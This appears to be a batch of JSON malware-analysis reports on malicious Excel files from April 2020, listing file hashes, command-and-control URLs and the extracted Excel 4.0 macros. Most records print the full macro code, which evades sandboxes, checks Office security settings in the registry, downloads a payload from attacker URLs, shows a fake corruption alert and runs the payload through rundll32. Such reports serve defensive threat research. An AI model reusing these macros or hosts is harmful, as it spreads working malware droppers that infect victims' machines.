{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f4e97f5e26b8602af7044541cf817c3a763de3ce17bcadeeaf891fe2b5358a4"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f4e97f5e26b8602af7044541cf817c3a763de3ce17bcadeeaf891fe2b5358a4","filesize":168960,"md5":"2a415379f35e025cfdd0f4ff17796759","sha1":"9748b8d67f030f0f7b9efd67b8a1b9469dfbf671","sha256":"1f4e97f5e26b8602af7044541cf817c3a763de3ce17bcadeeaf891fe2b5358a4","sha512":"d59100d11ae955a7ceaf8abffa8bc2f184d7572a8f0f4bf3e5ae41d264132b06cf93d62909d139725d77b38e426c79c777637f990de99db8d3c65b23fcf8668d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f4e97f5e26b8602af7044541cf817c3a763de3ce17bcadeeaf891fe2b5358a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5Cn4u9TfNx\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f50c8c41afeff391b5155bfa6789f4d172930913eee98b0ffaf3651f87a947f"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f50c8c41afeff391b5155bfa6789f4d172930913eee98b0ffaf3651f87a947f","filesize":214016,"md5":"6043df8c2c078235c309def44fb8f2ce","sha1":"271e38dd125a0b765f0c78ecb5e3e8c3c732a0b4","sha256":"1f50c8c41afeff391b5155bfa6789f4d172930913eee98b0ffaf3651f87a947f","sha512":"ccd08652a8c6baa04b470ace62baf630e6e02ec2d472f40a0b56f73854ed2183aecb0199c686f3a24510e0659a70f147251c50a012219a4dde9a71d54a2adb5f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f50c8c41afeff391b5155bfa6789f4d172930913eee98b0ffaf3651f87a947f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FIBXVK0vkr\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f54709a54ae7300279115188cf9015dad5146e59b6306e69026dce75c74e115"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f54709a54ae7300279115188cf9015dad5146e59b6306e69026dce75c74e115","filesize":207360,"md5":"014a6cac98c76513d939bdadcbb167d4","sha1":"67aa36498b0afd4bcd7d0a471fa5c12aea06967e","sha256":"1f54709a54ae7300279115188cf9015dad5146e59b6306e69026dce75c74e115","sha512":"609d547fd0fd496ed9877549e8b8b7f0f7c14a1c9270ff625161350c21a8babb6e11c0427ae7d7798cb8e8bcdf92b4352ad9af9b1749a876347ea59f3dc1f6cb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f54709a54ae7300279115188cf9015dad5146e59b6306e69026dce75c74e115.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://greentec-automation.com/wp-crun.php","https://narensyndicate.com/wp-crun.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://greentec-automation.com/wp-crun.php\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://narensyndicate.com/wp-crun.php\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Ahczh7gQND\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f7d8868d5de8f8f75829e3e8149251916bf5c657bc4953134897a8a03a28f39"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f7d8868d5de8f8f75829e3e8149251916bf5c657bc4953134897a8a03a28f39","filesize":206336,"md5":"efe349341465af60882d5d6bfa10e6db","sha1":"5d06c227193a23b0a86f86aa0ddd7c345523bf4f","sha256":"1f7d8868d5de8f8f75829e3e8149251916bf5c657bc4953134897a8a03a28f39","sha512":"55485bd6e793e8a920e51e53c52d33be5c57d89b7c628971234dd40264425c898400c12bddd91a61e16fe2a9a8bf60784765b5025067b7e2b978b2279549a2aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f7d8868d5de8f8f75829e3e8149251916bf5c657bc4953134897a8a03a28f39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZpJvydfoyA\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f94fc55fc0d6eb3a56bd686858dedaeb57ce967485daf1373e9c507a54567a4"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f94fc55fc0d6eb3a56bd686858dedaeb57ce967485daf1373e9c507a54567a4","filesize":225280,"md5":"dbf68c2b3b5921d8abf30b96249c6889","sha1":"9f9838246dbe50cdb80445d6091b4470299e3633","sha256":"1f94fc55fc0d6eb3a56bd686858dedaeb57ce967485daf1373e9c507a54567a4","sha512":"93d73f5ad2ebe9fe54805634d0b9ca4989c85200d973d6c6238065d8ee0176fbe9ac70a3d6c4da75f774389a5b43f2d83e47c2810d227d549cd35521aa4e6554","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f94fc55fc0d6eb3a56bd686858dedaeb57ce967485daf1373e9c507a54567a4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"4IEv3YhsKo\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1f9b318f50eaec7fb23646e3318f2356fbb68e548bf36a2294c0c3d712e1bfec"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1f9b318f50eaec7fb23646e3318f2356fbb68e548bf36a2294c0c3d712e1bfec","filesize":112128,"md5":"8a6e77bf85c489d55ca060d9191f8e0f","sha1":"915927ca198c657104be054f2448d09b0f3c7abb","sha256":"1f9b318f50eaec7fb23646e3318f2356fbb68e548bf36a2294c0c3d712e1bfec","sha512":"064c5d195ce301b2a4db250bec2ab6d5d2b0f3b3dbc00baf723651840fdf2812ba3bf712c27759334f1e0385b1c973bbf623c2dbb7acc0ae4f4afcb72abbf01f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1f9b318f50eaec7fb23646e3318f2356fbb68e548bf36a2294c0c3d712e1bfec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fa6081a0afed83325407087d8e4ebd542a5b35721f8892fc7aa14bf53170173"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1fa6081a0afed83325407087d8e4ebd542a5b35721f8892fc7aa14bf53170173","filesize":206336,"md5":"3c12b6de4debe582b1b736f2c17483ed","sha1":"2069a45214c012f1e4f81c4ed4f1d03b245c9e53","sha256":"1fa6081a0afed83325407087d8e4ebd542a5b35721f8892fc7aa14bf53170173","sha512":"53dbb989cbfe6445ebb8256fd9e3de4863246b1fd26750cabd4dbc0e70f35d57a80deff4be1b030f38c44f3af32f6fe38943937e7d1f4158650dc671de3a494d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fa6081a0afed83325407087d8e4ebd542a5b35721f8892fc7aa14bf53170173.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lKvXizEdlK\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fad7907d00ac5c87fcb492de8273d41fbef51f8d8b1364f75e81a56577841ee"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1fad7907d00ac5c87fcb492de8273d41fbef51f8d8b1364f75e81a56577841ee","filesize":212992,"md5":"241d9d7170ffa60b4e68862594193bd3","sha1":"d507449d72630504fbd77e204c49d1fbfe995be2","sha256":"1fad7907d00ac5c87fcb492de8273d41fbef51f8d8b1364f75e81a56577841ee","sha512":"54c2745181a270aac554cb010b9491282582ab1638cfd759f0e4d08c9424205c98656d826cb7911142607b46becd7d3a05f02cde6287ea4a899d6a66ae089787","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fad7907d00ac5c87fcb492de8273d41fbef51f8d8b1364f75e81a56577841ee.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://assemble.sg/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cworld.top/wp-front.php\",\"c:\\Users\\Public\\c6sga5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\c6sga5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"uIMssE6kx6\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fbb94f072e064ce7d65299f79a2daaf51b7c5166de1ed176394a0dfa24fd4d5"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1fbb94f072e064ce7d65299f79a2daaf51b7c5166de1ed176394a0dfa24fd4d5","filesize":168960,"md5":"e3068315c84fe6b046b038971c3f4ef7","sha1":"120593b4c90db9ae0c8982faf596a1b416a43459","sha256":"1fbb94f072e064ce7d65299f79a2daaf51b7c5166de1ed176394a0dfa24fd4d5","sha512":"60c6a2663d2a90406454a70c02bdcf4dc25856a9eed3e8396123ebb5376fec68c3f3a596948a48be559e09ab3b67a3280e26498259b1409177ee8a38eb683511","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fbb94f072e064ce7d65299f79a2daaf51b7c5166de1ed176394a0dfa24fd4d5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"zdUOLu7trm\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fc976793e89a01772b3c077248f12a0d9b420690ec0af5c28e819d4f4a445a3"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1fc976793e89a01772b3c077248f12a0d9b420690ec0af5c28e819d4f4a445a3","filesize":167936,"md5":"a01daa076d5535d650a1103402155347","sha1":"f4a13b62fe6dbd8c4352e26c868d24176abf7eb3","sha256":"1fc976793e89a01772b3c077248f12a0d9b420690ec0af5c28e819d4f4a445a3","sha512":"43f61ca7cb4cfcdecbbf4353d2cf549ab5256c316a614c25ae6aa9aa3041cffbf4a160c39fc6ca2b71d188405e462224213e987c7aa560a69c68b4d809ba3b00","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fc976793e89a01772b3c077248f12a0d9b420690ec0af5c28e819d4f4a445a3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dVoAsWu6ip\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fd8739ead8adf40469dd41645cf8665a4f5eb11ce15a4d3b24fa16f5fd49cde"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1fd8739ead8adf40469dd41645cf8665a4f5eb11ce15a4d3b24fa16f5fd49cde","filesize":185344,"md5":"79ce356aff0baad307686a463d2307ab","sha1":"3fa7ddcd8a4dd9535030a15da93501810cf80b08","sha256":"1fd8739ead8adf40469dd41645cf8665a4f5eb11ce15a4d3b24fa16f5fd49cde","sha512":"30ed28acda211c883a3a45c63a2f5a8bf27ff37cfa3b04f4c4bb47dd9f712b0f9c7b9d2bbac4648874f913a2027b0e3b90f64e9fa9b2df3535c529b7411f0cbe","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fd8739ead8adf40469dd41645cf8665a4f5eb11ce15a4d3b24fa16f5fd49cde.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/vbdh72F"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fdcf760fd8d6cc79f4661a8576001ef3d602b793ab547bc315a534c6c6950ef"},"analysis":{"reported":"2020-04-09T16:15:15Z","score":10},"files":[{"filename":"1fdcf760fd8d6cc79f4661a8576001ef3d602b793ab547bc315a534c6c6950ef","filesize":141824,"md5":"417bff8c14e353874038dfacff155a47","sha1":"845b195efa0bf41119eb57bb9a5ae3c52138dd27","sha256":"1fdcf760fd8d6cc79f4661a8576001ef3d602b793ab547bc315a534c6c6950ef","sha512":"a19863fcc3d9060c36dfecc559a326db11b60b91eb8e1a565f7fb7cf778e1a88299552713863077c3a6f26c3102d08ce357663fdf1cbbc705cd2b69f97c00b8b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fdcf760fd8d6cc79f4661a8576001ef3d602b793ab547bc315a534c6c6950ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"FHGjmcUdpi\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1fe8dd7b58159f60b1089cf6ccb0fd437c81b291d4e97bf0c8abab1a29a8dab2"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"1fe8dd7b58159f60b1089cf6ccb0fd437c81b291d4e97bf0c8abab1a29a8dab2","filesize":170496,"md5":"7c9345dae0c335bb6d1ea36542f8ca2f","sha1":"b219e36bf6a2331d4b3445a1c4404d5dd4067346","sha256":"1fe8dd7b58159f60b1089cf6ccb0fd437c81b291d4e97bf0c8abab1a29a8dab2","sha512":"2dec202949d6ad41ae05fbbe2890e402ba3689619f1a05871d91dc28383f7bac601cc728d547e88d2f65d8955fc19463fe311156ac7dabce4c2c5ec6d9713e7f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1fe8dd7b58159f60b1089cf6ccb0fd437c81b291d4e97bf0c8abab1a29a8dab2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Zz2BkinRt3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1feeec98f380a7c58337c663506a99084df82b991f9ff285756d63408b4d8ad0"},"analysis":{"reported":"2020-04-09T16:15:16Z","score":10},"files":[{"filename":"1feeec98f380a7c58337c663506a99084df82b991f9ff285756d63408b4d8ad0","filesize":167936,"md5":"9014e0640808d0376f9a3a1456e33a90","sha1":"723585e4119c84f8e9446739a1e86e78e1228880","sha256":"1feeec98f380a7c58337c663506a99084df82b991f9ff285756d63408b4d8ad0","sha512":"dbbf6d344dbcb113244af96785aaf8ac871639caadd31ba695197d5fc0916fd7ae6fa494216404999fef7059e58d99f6df65219ed30a330944439a4b7fb24787","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1feeec98f380a7c58337c663506a99084df82b991f9ff285756d63408b4d8ad0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"EkleERPFSP\",TRUE)\nGOTO(R$0C$19)"}}}]}
